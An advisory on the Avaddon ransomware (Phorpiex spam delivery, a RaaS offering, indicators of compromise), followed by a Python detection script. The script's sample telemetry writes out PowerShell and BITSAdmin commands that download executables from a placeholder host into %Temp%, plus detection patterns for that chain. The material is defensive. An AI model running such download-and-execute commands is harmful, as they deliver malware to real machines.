On June 8, 2020, a new ransomware family, dubbed “Avaddon,” was observed being distributed through a large spam campaign targeting users globally. The Phorpiex botnet has been identified as the distributor, sending malicious emails that carry a JavaScript attachment masquerading as a JPG image. When the recipient opens the attachment, the JavaScript runs PowerShell and BITSAdmin commands to download the Avaddon executable to the %Temp% folder. The ransomware then encrypts the victim’s files, appending the “.avdn” extension to each, and drops a ransom note directing the victim to a Tor payment site with instructions on how to pay for a decryptor.

According to an advertisement observed on an undisclosed Russian forum, the Avaddon operators claim to be running a new Ransomware-as-a-Service (RaaS) program. Affiliates who join can distribute the ransomware through spam, compromised networks, and exploit kits, but must abide by a set of rules, such as not targeting victims in the Commonwealth of Independent States (CIS): Armenia, Azerbaijan, Belarus, Georgia, Kazakhstan, Kyrgyzstan, Moldova, Russia, Tajikistan, Turkmenistan, Ukraine, and Uzbekistan. At the time of writing, the overall impact of the Avaddon campaign is unclear.

Users are advised to maintain reliable, tested backups that can actually be restored, implement an anti-spam solution to stop phishing emails from reaching the network, and keep operating systems up to date. The following indicators of compromise have been identified for Avaddon ransomware:

SHA-256 hashes:

94faa76502bb4342ed7cc3207b3158027807a01575436e2b683d4816842ed65d

05af0cf40590aef24b28fa04c6b4998b7ab3b7f26e60c507adb84f3d837778f2
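As an added example (not part of the original advisory), the following Python script shows how the infection chain described above could be checked against host telemetry: an attachment name with a double extension (image name ending in .js), a script host (wscript.exe or cscript.exe) spawning powershell.exe or bitsadmin.exe with a command line pointing at %Temp%, files renamed with the .avdn extension, and a SHA-256 comparison against the two hashes listed above. The pipe-separated key=value log format, the sample events, the file paths and the host-to-downloader process pairing are assumptions made for illustration; only the two hashes are taken from the page.

```python
import hashlib
import re
from typing import Dict, List, Optional

# SHA-256 indicators listed in this advisory for Avaddon samples.
AVADDON_SHA256 = {
    "94faa76502bb4342ed7cc3207b3158027807a01575436e2b683d4816842ed65d",
    "05af0cf40590aef24b28fa04c6b4998b7ab3b7f26e60c507adb84f3d837778f2",
}

# Windows script hosts that execute a .js attachment (assumed), and the two
# downloaders the advisory names in the Avaddon chain.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
DOWNLOADERS = {"powershell.exe", "bitsadmin.exe"}

# Constructed sample telemetry (not real logs). The pipe-separated
# key=value layout is an assumption for this example.
SAMPLE_PROCESS_EVENTS = [
    "parent=C:\\Windows\\System32\\wscript.exe"
    "|image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|cmdline=powershell -w hidden (New-Object Net.WebClient).DownloadFile('http://example.invalid/a','%TEMP%\\a.exe')",
    "parent=C:\\Windows\\System32\\wscript.exe"
    "|image=C:\\Windows\\System32\\bitsadmin.exe"
    "|cmdline=bitsadmin /transfer job http://example.invalid/b %TEMP%\\b.exe",
    "parent=C:\\Windows\\explorer.exe"
    "|image=C:\\Windows\\System32\\notepad.exe"
    "|cmdline=notepad.exe",
]
SAMPLE_FILE_EVENTS = [
    "C:\\Users\\alice\\Documents\\budget.xlsx.avdn",
    "C:\\Users\\alice\\Pictures\\holiday.jpg.avdn",
    "C:\\Users\\alice\\Documents\\notes.txt",
]


def is_double_extension_script(filename: str) -> bool:
    """Names like 'IMG_2020.jpg.js' look like images but run as scripts."""
    return re.search(r"\.(jpe?g|png|gif)\.(js|jse|vbs|wsf)$", filename.lower()) is not None


def parse_event(line: str) -> Dict[str, str]:
    """Split one 'key=value|key=value' event line into a dict."""
    fields: Dict[str, str] = {}
    for token in line.split("|"):
        key, _, value = token.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def flag_process_event(event: Dict[str, str]) -> Optional[str]:
    """Return a reason when a script host spawns one of the named downloaders."""
    parent = _basename(event.get("parent", ""))
    image = _basename(event.get("image", ""))
    cmdline = event.get("cmdline", "").lower()
    if parent not in SCRIPT_HOSTS or image not in DOWNLOADERS:
        return None
    if "%temp%" in cmdline or "\\appdata\\local\\temp\\" in cmdline:
        return f"{parent} spawned {image} fetching a payload into %Temp%"
    return f"{parent} spawned {image}"


def avaddon_encrypted_files(paths: List[str]) -> List[str]:
    """Files carrying the .avdn extension Avaddon appends after encryption."""
    return [p for p in paths if p.lower().endswith(".avdn")]


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def matches_ioc(data: bytes, iocs=AVADDON_SHA256) -> bool:
    """True when the SHA-256 of a file's bytes is in the IOC set."""
    return sha256_hex(data) in iocs


def triage(process_lines: List[str], file_paths: List[str]) -> Dict[str, object]:
    alerts = [r for r in (flag_process_event(parse_event(l)) for l in process_lines) if r]
    encrypted = avaddon_encrypted_files(file_paths)
    return {
        "process_alerts": alerts,
        "encrypted_files": encrypted,
        "likely_avaddon": bool(alerts) or bool(encrypted),
    }


if __name__ == "__main__":
    print(triage(SAMPLE_PROCESS_EVENTS, SAMPLE_FILE_EVENTS))
```

The hash check only catches the two samples listed above; a rebuilt binary will not match, which is why the behavioural checks (script host spawning a downloader into %Temp%, .avdn renames) are the more durable signal.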
